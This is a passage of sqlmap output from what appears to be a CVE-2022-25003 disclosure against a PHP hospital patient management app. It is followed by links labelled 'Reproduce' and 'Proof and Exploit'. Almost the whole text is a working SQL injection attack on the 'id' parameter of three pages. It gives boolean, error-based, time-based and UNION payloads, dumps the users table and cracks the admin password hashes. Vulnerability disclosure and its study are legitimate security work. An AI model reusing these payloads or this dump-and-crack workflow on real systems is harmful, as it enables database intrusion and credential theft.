[12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:03:07] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:03:07] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:03:08] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:03:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:03:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:03:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:03:08] [INFO] testing 'MySQL inline queries'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:03:08] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:03:14] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:03:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:03:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:03:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:03:14] [INFO] target URL appears to have 7 columns in query
[12:03:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5342=5342 AND 'TSQh'='TSQh
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4644=4644,1))),0x71626a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TAyy'='TAyy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2728 FROM (SELECT(SLEEP(3)))orQs) AND 'lADO'='lADO
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-6378' UNION ALL SELECT CONCAT(0x7162626b71,0x534e7a6c74596e766e426e5667486f7661586c6b445a556f485551486a547562436345664f585462,0x71626a6a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[12:03:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, Apache 2.4.52, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:03:15] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:03:15] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:03:15] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:03:15] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:03:26] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:03:26] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:03:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:03:26] [INFO] starting 4 processes
[12:03:32] [INFO] cracked password 'admin123' for user 'admin'
[12:03:42] [INFO] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+-----------------------------------------------+
| username | password                                      |
+----------+-----------------------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 (admin123)  |
| cblake   | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+-----------------------------------------------+
[12:04:04] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:04:04] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:04:04 /2022-03-01/
SQL - Injecting for parameter 'id' in view_history.php app
[*] starting @ 12:04:09 /2022-03-01/
[12:04:09] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=om5n296h9bj...urhf8qd1t0'). Do you want to use those [Y/n] Y
[12:04:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:04:09] [INFO] testing if the target URL content is stable
[12:04:10] [INFO] target URL content is stable
[12:04:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:04:10] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:04:10] [WARNING] reflective value(s) found and filtering out
[12:04:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:04:10] [INFO] testing 'Generic inline queries'
[12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:04:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:04:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:04:14] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable
[12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:04:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:04:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:04:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:04:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:04:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:04:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:04:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:04:14] [INFO] testing 'MySQL inline queries'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:04:20] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:04:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:04:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:04:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:04:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:04:21] [INFO] target URL appears to have 10 columns in query
[12:04:21] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[12:04:21] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 2894=2894#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 2823 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(2823=2823,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NtWR
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2385 FROM (SELECT(SLEEP(3)))Nuwd)-- bAsV
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b6a71,0x54706a5a776b54714371787a617078774f7450657455496f7a614e75547177536961544c74546875,0x7170717871),NULL,NULL,NULL,NULL,NULL,NULL#
---
[12:04:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 8.1.2, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:04:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:04:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:04:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:04:21] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:04:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:04:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:04:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:04:21] [INFO] starting 4 processes
[12:04:35] [INFO] cracked password 'stupid123' for user 'cblake'
[12:04:35] [INFO] cracked password 'admin123' for user 'admin'
Database: hprms_db
Table: users
[2 entries]
+----------+-----------------------------------------------+
| username | password                                      |
+----------+-----------------------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 (admin123)  |
| cblake   | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+-----------------------------------------------+
[12:05:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:05:01] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:05:01 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_admission.php app
[*] starting @ 12:05:09 /2022-03-01/
[12:05:09] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=20uv7un8gs4...8s8qj5kopv'). Do you want to use those [Y/n] Y
[12:05:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:05:09] [INFO] testing if the target URL content is stable
[12:05:10] [INFO] target URL content is stable
[12:05:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:05:10] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:05:10] [WARNING] reflective value(s) found and filtering out
[12:05:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:05:10] [INFO] testing 'Generic inline queries'
[12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:05:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:05:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:05:15] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:05:16] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="Fatal")
[12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:05:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:05:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:05:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:05:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:05:16] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:05:16] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:05:16] [INFO] testing 'MySQL inline queries'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:05:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:05:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:05:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:05:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:05:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:05:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:05:31] [INFO] target URL appears to have 8 columns in query
[12:05:31] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 204 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0x28 END))-- QynS
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 7634 FROM(SELECT COUNT(*),CONCAT(0x716b7a6b71,(SELECT (ELT(7634=7634,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vmRW
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8229 FROM (SELECT(SLEEP(3)))Qpzi)-- hEWR
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x716b7a6b71,0x446147684b447641734a4e63496e494a4b67784956554b4952515543684251577076656f42487754,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[12:05:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, PHP, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:05:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:05:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:05:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:05:31] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:05:31] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:05:31] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:05:31] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:05:31] [INFO] starting 4 processes
[12:05:37] [INFO] cracked password 'admin123' for user 'admin'
[12:05:48] [INFO] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+-----------------------------------------------+
| username | password                                      |
+----------+-----------------------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 (admin123)  |
| cblake   | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+-----------------------------------------------+
[12:06:08] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:06:08] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:06:08 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_room_type.php app
[*] starting @ 12:06:15 /2022-03-01/
[12:06:15] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5u1m2tvs8rd...mm5ijndlgg'). Do you want to use those [Y/n] Y
[12:06:15] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:06:15] [INFO] testing if the target URL content is stable
[12:06:16] [INFO] target URL content is stable
[12:06:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:06:16] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:06:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:06:16] [WARNING] reflective value(s) found and filtering out
[12:06:16] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Private Room with Single Patient Bed.")
[12:06:16] [INFO] testing 'Generic inline queries'
[12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:06:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:06:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:06:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:06:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:06:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:06:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:06:17] [INFO] testing 'MySQL inline queries'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:06:17] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:06:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:06:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:06:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:06:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:06:23] [INFO] target URL appears to have 6 columns in query
[12:06:24] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4275=4275 AND 'Pbap'='Pbap
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 7905 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(7905=7905,1))),0x716b717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AwDy'='AwDy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1604 FROM (SELECT(SLEEP(3)))MPcP) AND 'bAKs'='bAKs
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6478' UNION ALL SELECT CONCAT(0x71626a6b71,0x616d625874694476617a78684a536b747145584d54786b47637545457570594e6e5766734f587249,0x716b717171),NULL,NULL,NULL,NULL,NULL-- -
---
[12:06:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:06:24] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:06:24] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:06:24] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:06:24] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:06:24] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:06:24] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:06:24] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:06:24] [INFO] starting 4 processes
[12:06:30] [INFO] cracked password 'admin123' for user 'admin'
[12:06:40] [INFO] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+-----------------------------------------------+
| username | password                                      |
+----------+-----------------------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 (admin123)  |
| cblake   | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+-----------------------------------------------+
[12:07:03] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:07:03] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:07:03 /2022-03-01/
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-25003)
## Proof and Exploit:
[href](https://streamable.com/ymn0ko)